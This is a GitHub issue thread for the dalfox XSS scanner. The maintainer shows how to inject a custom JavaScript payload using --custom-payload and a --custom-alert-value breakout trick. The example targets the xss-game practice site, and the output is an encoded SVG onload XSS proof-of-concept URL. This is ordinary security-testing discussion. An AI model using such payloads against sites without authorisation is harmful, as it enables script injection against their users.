search

hahwul / dalfox

🌙🦊 Dalfox is a powerful open-source XSS scanner and utility focused on automation.
https://dalfox.hahwul.com
MIT License
3.68k stars 411 forks source link

Testing script injection #466

Open ChillVibesMushroom opened 1 year ago

ChillVibesMushroom commented 1 year ago

Question

Your questions Is it possible to test my personal Js script for injection using dalfox

hahwul commented 1 year ago

To achieve your desired action, there are three specific flags that you can try.

If you want to test with a custom payload, you can use the --custom-payload flag. The other flags are related to functions, such as alert. Currently, there is no direct way to modify the function, but you can achieve a similar effect with a simple trick (with --custom-alert-value). 

dalfox url https://xss-game.appspot.com/level1/frame \
  --custom-alert-value "1);your_payload;console.log("

# [POC][R][GET][inHTML-none(1)-URL] https://xss-game.appspot.com/level1/frame?query=%3CsVg%2Fonload%3Dprompt%281%29%3Byour_payload%3Bconsole.log%28%29%3E
# https://xss-game.appspot.com/level1/frame?query=%3CsVg%2Fonload%3Dprompt%281%29%3Byour_payload%3Bconsole.log%28%29%3E

스크린샷 2023-05-01 오후 1 03 57

If you're interested, I can write some code and create a new flag that modifies the function. (e.g --custom-func)

ChillVibesMushroom commented 1 year ago

dalfox url https://xss-game.appspot.com/level1/frame \ --custom-payload /home/scripts/JavaScript.js

Would that input be right ?

hahwul commented 1 year ago

@ChillVibesMushroom The use of flag is correct. However, I think it may differ from the desired behavior depending on what the file means and the purpose.

Could you show me an example of the .js file? I don't understand exactly what kind of action you want. 😭

ChillVibesMushroom commented 1 year ago

@ChillVibesMushroom The use of flag is correct. However, I think it may differ from the desired behavior depending on what the file means and the purpose.

Could you show me an example of the .js file? I don't understand exactly what kind of action you want. 😭

hahwul commented 1 year ago

@ChillVibesMushroom I think that would be suitable for --custom-payload flag.

ChillVibesMushroom commented 1 year ago

Ill give it a shot right now Im looking into different frameworks I just remembered I actually do have to install Dalfox you know what I realized though that the tool is pretty powerful it doesn't automatically go incognito mode it just gets straight too it and alongside other tools like hakrawler its powerful.

I was going to ask you but I never got the chance what tools would you use alongside dalfox when scanning a website for vulnerabilities.